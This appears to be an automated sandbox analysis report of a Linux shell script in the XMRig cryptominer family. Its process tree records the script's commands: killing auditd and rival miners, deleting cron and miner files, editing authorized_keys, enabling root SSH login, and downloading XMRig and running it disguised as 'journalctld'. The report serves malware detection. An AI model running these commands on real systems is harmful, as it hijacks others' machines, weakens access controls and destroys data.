Analysis
-
max time kernel
2s -
max time network
3s -
platform
ubuntu-24.04_amd64 -
resource
ubuntu2404-amd64-20240523-en -
resource tags
-
submitted
04-11-2024 19:25
General
-
Target
ee2a1838344c1b22dcea81766204f3692A.sh
-
Size
6KB
-
MD5
5e2f203cb513bf4b210ac61b009df327
-
SHA1
c77e72660d9034fe26137b040a3f073b7725d233
-
SHA256
07f9edc6e718ebcbead64e0a2afda717f9296e76a2a5654c2b50ad7e76cd4106
-
SHA512
7a3519c73104a327731dfa3a8507b72ea95d77f6eb8980bb072aad98c6955f11961d9716cb587cd8173fd9aa359158b91d6d59262cda496b80b32a822acd3247
-
SSDEEP
192:4prsOPBNttuJzzCdEifVHsmVHyC3Kx7OW81nFZBh2A7o7oNcoTuwFoFxuF0y:esOPBNttuJzzC3VHsmVHyCax7M1nFZBV
Malware Config
Signatures
-
Xmrig_linux family
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Executes dropped EXE 1 IoCs
-
OS Credential Dumping 1 TTPs 10 IoCs
Adversaries may attempt to dump credentials to use it in password cracking.
-
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 10 IoCs
Abuse sudo or cached sudo credentials to execute code.
-
Checks hardware identifiers (DMI) 1 TTPs 4 IoCs
Checks DMI information which indicate if the system is a virtual machine.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads hardware information 1 TTPs 14 IoCs
Accesses system info like serial numbers, manufacturer names etc.
-
Checks CPU configuration 1 TTPs 2 IoCs
Checks CPU information which indicate if the system is a virtual machine.
-
Reads CPU attributes 1 TTPs 51 IoCs
-
Enumerates kernel/hardware configuration 1 TTPs 28 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
-
Process Discovery 1 TTPs 1 IoCs
Adversaries may try to discover information about running processes.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 1 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/ee2a1838344c1b22dcea81766204f3692A.sh/tmp/ee2a1838344c1b22dcea81766204f3692A.sh1⤵
-
/usr/bin/sudosudo systemctl stop c3pool_miner.service2⤵
- OS Credential Dumping
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
-
/usr/bin/systemctlsystemctl stop c3pool_miner.service3⤵
-
-
-
/usr/bin/sudosudo systemctl disable c3pool_miner.service2⤵
- OS Credential Dumping
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
-
/usr/bin/systemctlsystemctl disable c3pool_miner.service3⤵
-
-
-
/usr/bin/sudosudo systemctl disable xmrig.service2⤵
- OS Credential Dumping
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
-
/usr/bin/systemctlsystemctl disable xmrig.service3⤵
-
-
-
/usr/bin/sudosudo systemctl stop journalctld.service2⤵
- OS Credential Dumping
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
-
/usr/bin/systemctlsystemctl stop journalctld.service3⤵
-
-
-
/usr/bin/sudosudo systemctl disable journalctld.service2⤵
- OS Credential Dumping
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
-
/usr/bin/systemctlsystemctl disable journalctld.service3⤵
-
-
-
/usr/bin/pidofpidof xmrig2⤵
- Reads runtime system information
-
-
/usr/bin/psps aux2⤵
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/grepgrep "[--]config="2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
- Reads runtime system information
-
-
/usr/bin/sudosudo killall xmrig2⤵
- OS Credential Dumping
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
-
/usr/bin/killallkillall xmrig3⤵
- Reads runtime system information
-
-
-
/usr/bin/sudosudo pkill xmrig2⤵
- OS Credential Dumping
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
-
/usr/bin/pkillpkill xmrig3⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
-
-
-
/usr/bin/sudosudo pkill auditd2⤵
- OS Credential Dumping
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
-
/usr/bin/pkillpkill auditd3⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
-
-
-
/usr/bin/killallkillall -9 xmrig2⤵
- Reads runtime system information
-
-
/usr/bin/killallkillall xmrig2⤵
- Reads runtime system information
-
-
/usr/bin/pkillpkill xmrig2⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
-
-
/usr/bin/pkillpkill auditd2⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
-
-
/usr/bin/killallkillall auditd2⤵
- Reads runtime system information
-
-
/usr/bin/rmrm -rf rm -rf /root/.local/.c2⤵
-
-
/usr/bin/rmrm -rf /.c3pool2⤵
-
-
/usr/bin/rmrm -rf /root/.c3pool2⤵
-
-
/usr/bin/rmrm -rf /.local/share/auditd2⤵
-
-
/usr/bin/rmrm -rf "/.local/.c*"2⤵
-
-
/usr/bin/rmrm -rf /.local/bin/auditd2⤵
-
-
/usr/bin/rmrm -rf /etc/cron.daily2⤵
-
-
/usr/bin/rmrm -rf /etc/cron.daily/auditd2⤵
-
-
/usr/bin/rmrm -rf /etc/systemd/system/journalctld.service2⤵
-
-
/usr/bin/findfind . -name "*c3pool*" -exec rm -rf "{}" ";"2⤵
-
-
/usr/bin/findfind . -name "*xmrig*" -exec rm -rf "{}" ";"2⤵
-
-
/usr/bin/findfind . -name "*miner*" -exec rm -rf "{}" ";"2⤵
-
-
/usr/bin/findfind -name "*c3pool*" -exec rm -rf "{}" ";"2⤵
-
-
/usr/bin/findfind -name "*xmrig*" -exec rm -rf "{}" ";"2⤵
-
-
/usr/bin/findfind -name "*miner*" -exec rm -rf "{}" ";"2⤵
-
-
/usr/bin/findfind -name "*c4*" -exec rm -rf "{}" ";"2⤵
-
-
/usr/bin/findfind -name "*auditd*" -exec rm -rf "{}" ";"2⤵
-
-
/usr/bin/sedsed -i /AAAAB3NzaC1yc2EAAAADAQABAAABgQDJRrXGodFAgNzqgVw4QmjxKhZbvc6ReMa0ctI8WGbWBi/d /.ssh/authorized_keys2⤵
-
-
/usr/bin/sedsed -i /AAAAB3NzaC1yc2EAAAADAQABAAABgQDJRrXGodFAgNzqgVw4QmjxKhZbvc6ReMa0ctI8WGbWBi/d /root/.ssh/authorized_keys2⤵
-
-
/usr/bin/sedsed -i "/c3pool/d;/miner.sh/d" /.profile2⤵
-
-
/usr/bin/sedsed -i "/c3pool/d;/miner.sh/d" /root/.profile2⤵
-
-
/usr/bin/mkdirmkdir /.ssh2⤵
-
-
/usr/bin/touchtouch /.ssh/authorized_keys2⤵
-
-
/usr/bin/chmodchmod 600 /.ssh/authorized_keys2⤵
-
-
/usr/bin/chmodchmod go-w /root/2⤵
-
-
/usr/bin/chmodchmod go-w /root2⤵
-
-
/usr/bin/chmodchmod 700 /root/.ssh2⤵
-
-
/usr/bin/chmodchmod 700 /root/.ssh2⤵
-
-
/usr/bin/chmodchmod 600 /root/.ssh/authorized_keys2⤵
-
-
/usr/bin/chownchown root /root2⤵
-
-
/usr/bin/chownchown root /root/.ssh2⤵
-
-
/usr/bin/sudosudo sed -i "s/#PermitRootLogin prohibit-password/PermitRootLogin yes/" /etc/ssh/sshd_config2⤵
- OS Credential Dumping
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
-
/usr/bin/sedsed -i "s/#PermitRootLogin prohibit-password/PermitRootLogin yes/" /etc/ssh/sshd_config3⤵
-
-
-
/usr/bin/sudosudo sed -i "s/#PubkeyAuthentication yes/PubkeyAuthentication yes/" /etc/ssh/sshd_config2⤵
- OS Credential Dumping
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
-
/usr/bin/sedsed -i "s/#PubkeyAuthentication yes/PubkeyAuthentication yes/" /etc/ssh/sshd_config3⤵
-
-
-
/usr/bin/mkdirmkdir -p /.local/.c2⤵
-
-
/.local/.c/journalctld/.local/.c/journalctld --help2⤵
-
-
/usr/bin/curlcurl -s4 https://api.github.com/repos/xmrig/xmrig/releases/latest2⤵
-
-
/usr/bin/grepgrep browser_download2⤵
-
-
/usr/bin/grepgrep linux-static2⤵
-
-
/usr/bin/cutcut "-d\"" -f42⤵
-
-
/usr/bin/curlcurl -s4 -L https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz -o /tmp/xmrig.tar.gz2⤵
- Writes file to tmp directory
-
-
/usr/bin/tartar xf /tmp/xmrig.tar.gz -C /.local/.c "--strip=1"2⤵
- System Network Configuration Discovery
-
/usr/local/sbin/gzipgzip -d3⤵
-
-
/usr/local/bin/gzipgzip -d3⤵
-
-
/usr/sbin/gzipgzip -d3⤵
-
-
/usr/bin/gzipgzip -d3⤵
-
-
-
/usr/bin/rm2⤵
-
-
/usr/bin/mv2⤵
-
-
/.local/.c/journalctld2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Abuse Elevation Control Mechanism
1Sudo and Sudo Caching
1Virtualization/Sandbox Evasion
2System Checks
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
150B
MD5554d057fe1c4eab2071450cf6c434dc5
SHA19fa4d5aa72d698f72d105fce0bd44657f244c7e6
SHA256cd4a3226d74b573cbd1af1280543912259d6f0e1f5e59c39848700aa01b95de1
SHA512be34f9b3e7ad12baba834da1b57fd6c943935792be2c026c49887e02cb3bd5645d7152dab2a4d760b5a1c09d782f72c6119098efbae63ccaa295cee83da3abb8
-
Filesize
2KB
MD566f38c96a4901e7b345787c447842b3e
SHA12aa9b4d1bd2edd5d81bd9725e9318edaee67531f
SHA2562b03943244871ca75e44513e4d20470b8f3e0f209d185395de82b447022437ec
SHA51271757fad29d6d2a257362ed28cde9f249cc8a14e646dee666c9029ea97c72de689cdf8ed5cf0365195a6a6831fe77d82efe5e2fa555c6cc5078f1f29ae8dd68f
-
Filesize
7.2MB
MD5e1ac6eb6106e57e822ae749d77644768
SHA19d086db5cc74762fc5d3941cd2683efbc790a846
SHA256c2fcf45410900546e566fdfe87cf085b47cbe71a995bf33f9a81d611ae6c981c
SHA51228bb6a00679093d24dcdebb07369f711436acde108c5447ddc969c20b3692c50569df70a227dbc67404f298bfc13089c094f26f993c6db9f48f41a25b5844a87
-
Filesize
553B
MD583114d8ac16a947ad92ed44aba42b584
SHA1c0d45aaf0520481cbb9919f40de870a2b1fb1e26
SHA2567ae9e600a69d66a01c7163b69b1545015289cc8d45679d3fc4c6ce84b138ff38
SHA512f0baf0f4e919d7e054f9f409d0c964a0548d7725b672ae902b4efc43618033ade52db5a78419dad3f298509fd1cbb512fe66fdee9429fdbf039d46c8cc587303
-
Filesize
3KB
MD5287c70a3266e7e5e7a253864266b898e
SHA18698de52964d89bca4ec3f6cc2eeb2d3ffc6b956
SHA256a3d17d12dd45c0befa9dccfcd085be892c045e3aad662d807f0f62378a6d3515
SHA512411b204b6efb461329074fabe9be45e492daef5d09a913d05e0b815bf633382a79a4f5981392e7f1757a760d1dda7a8dc973230dd39278179b24014df8411112
-
Filesize
3KB
MD5ef1ab31192a3c9ebf577fd39ecf7a34d
SHA1d8ff44c387d809f11d2cf1055ee6718af87a9716
SHA256e8c04b7d895018f4b691f3b08cc746d0ffc8804d5f3bda48e500ef9a447ab769
SHA5126fd088397bf492e1878945da95eb532c05d8e6d6eb352a3bb959996cdfabc66b7c244942583b46aa64f740ca26379988350b9d69e48898737b073ccbc766fc70
-
Filesize
171B
MD5b4459ed3e12057b32e5956ff7f28b0f6
SHA108ed5fad411e738cfc5c216ecb286f1052a0f989
SHA25659d632078f559b8c50ff1d13e201dd0d84ae20227b3f19472060ec438a6c31d4
SHA512765340f155169ed90f7f39648590a046ff751eec4c5e83075fc58b0d00f7a220d6045aa8bf9c4be0a884e746850b2b9883615a626d75ad9e50452cc5888d1538
-
Filesize
3.3MB
MD58feb9a1c7da97b6e0d254d93da37371d
SHA1090510d9ac1aedbce99fe98cc7396cfcfe6a3951
SHA256b2c88b19699e3d22c4db0d589f155bb89efbd646ecf9ad182ad126763723f4b7
SHA5122dd6b60365b553dcc703ed0e804dc1744d7288e3f328798afa6ec9f32e13eefa3ee88a3fa01cfd22f0493d2a2125b803f42f268ee3ac0cf6c2f4e3496fa065db